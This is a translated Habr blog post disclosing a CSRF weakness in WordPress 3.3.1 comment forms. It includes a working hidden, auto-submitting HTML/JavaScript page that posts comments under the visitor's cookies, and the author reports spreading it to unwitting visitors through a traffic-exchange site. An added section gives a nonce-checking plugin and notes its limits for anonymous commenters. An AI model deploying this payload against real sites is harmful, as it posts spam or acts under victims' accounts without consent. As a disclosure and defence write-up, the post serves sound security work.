
CSRF Wordpress Vulnerability - Comments

Introduction


Yesterday I read about Yegor Khomyakov. I thought: maybe I can do it too? So I started with my own WordPress blog. I will not give its address, otherwise the blog itself will go down under the Habr effect, and I will be accused of advertising :).

Theory


So where does it make sense to look for CSRF in WordPress? Only one thing comes to mind: comments. That is where I started.
Careful: under the cut there are two medium-sized PNG images. (ethics, ethics...)

Let us look at the form code (slightly simplified):

```html
<form action="http://example.com/wp-comments-post.php" method="post" id="commentform">
  <p>
    <input type="text" name="author" id="author" class="styled" value="" size="22" tabindex="1">
    <input type="hidden" name="comment_post_ID" value="123">
    <label for="author"><small></small></label>
  </p>
  <p>
    <input type="text" name="email" id="email" value="" size="22" tabindex="2">
    <label for="email"><small> ()</small></label>
  </p>
  <p>
    <input type="text" name="url" id="url" value="" size="22" tabindex="3">
    <label for="url"><small></small></label>
  </p>
  <p><textarea name="comment" id="comment" cols="100%" rows="10" tabindex="4"></textarea></p>
  <p><input name="submit" type="submit" id="submit" tabindex="5" value=""></p>
</form>
```

The first thing that stands out: there is no anti-CSRF token or anything like it. On some blogs I did notice something resembling a token coming from Akismet, but on my own WordPress 3.3.1 install with Akismet there is no token at all.

Without further ado, I wrote a simple page:

```html
<div style="display:none;">
  <form action="http://example.com/wp-comments-post.php" method="post" id="commentform">
    <p>
      <input type="hidden" name="author" id="author" value="">
      <input type="hidden" name="comment_post_ID" value="123">
    </p>
    <p><input type="hidden" name="email" id="email" value=""></p>
    <p><input type="hidden" name="comment" id="comment" value="LOL"></p>
    <script>
      // Random author name and e-mail so every hit looks like a new commenter,
      // then submit the form as soon as the page loads.
      document.getElementById('author').value = (Math.random() * 100000).toFixed(0);
      document.getElementById('email').value = (Math.random() * 100000).toFixed(0) + '@mail.mail';
      document.forms.commentform.submit();
    </script>
  </form>
</div>
```


As you can see, a page with this content submits the comment form to the test blog with an author name made of random digits and an e-mail address of the form <random digits>@mail.mail. The well-known word LOL was chosen as the comment text. The request carries the visitor's cookies, so if the visitor is logged in to the blog the comment is posted under their account.
The drawback of this particular code is that submitting the form navigates the visitor to the target blog. That is trivially solved by pointing the form at a hidden iframe.

Practice


Without further ado, I put this page on PasteHTML together with the page containing the iframe and fed it into a "site promotion system", where site owners surf each other's pages in order to get traffic in return.
The result is quite predictable:





Conclusion


CSRF is widespread. But I do not understand why it is tolerated in software like this.
And no Akismet helped.
Conclusion: use a captcha! :)
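For comparison, here is what a form token check looks like in WordPress terms. This is an added example, not code from the original post and not WordPress core code; it is a minimal plugin that uses the core hooks `comment_form_after_fields`, `comment_form_logged_in_after` and `pre_comment_on_post` together with `wp_nonce_field()` / `wp_verify_nonce()`. The action name `example_comment_form` and the field name `example_comment_nonce` are this example's own choices.

```php
<?php
/*
Plugin Name: Comment Form Nonce (added example)
Description: Adds a nonce to the comment form and rejects submissions without a valid one.
*/

// Added example, not WordPress core code. Hypothetical names: the nonce action
// 'example_comment_form' and the POST field 'example_comment_nonce'.

// Render the hidden nonce field inside the comment form, both in the
// anonymous form (after the author/email/url fields) and in the form shown
// to logged-in users.
function example_comment_nonce_field() {
    wp_nonce_field( 'example_comment_form', 'example_comment_nonce' );
}
add_action( 'comment_form_after_fields', 'example_comment_nonce_field' );
add_action( 'comment_form_logged_in_after', 'example_comment_nonce_field' );

// pre_comment_on_post fires only for submissions that arrive through
// wp-comments-post.php, so pingbacks and trackbacks (which have no form and
// no nonce) are not affected by this check.
function example_check_comment_nonce( $comment_post_id ) {
    $nonce = isset( $_POST['example_comment_nonce'] ) ? $_POST['example_comment_nonce'] : '';
    if ( ! wp_verify_nonce( $nonce, 'example_comment_form' ) ) {
        // Stop processing before the comment is stored.
        wp_die(
            'Comment rejected: missing or invalid form token.',
            'Forbidden',
            array( 'response' => 403 )
        );
    }
}
add_action( 'pre_comment_on_post', 'example_check_comment_nonce' );
```

Two caveats a practitioner should keep in mind. First, WordPress nonces for visitors who are not logged in are computed from user ID 0 with no per-visitor component, so every anonymous visitor receives the same value within the same time window; an attacker can simply fetch the blog's comment form, copy the nonce into the hidden form from the article, and the check passes. The token therefore stops the attack for logged-in commenters, whose nonce is tied to their account, but not for anonymous ones, which is exactly the case the author's captcha suggestion covers. Second, nonces expire after 12 to 24 hours, so a page cache that serves the comment form for longer than that will cause legitimate comments to be rejected.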

PS Whoever can and wants to, please write to the developers.
PPS This is my first article on Habr, please do not judge too harshly :)

Source: https://habr.com/ru/post/141414/
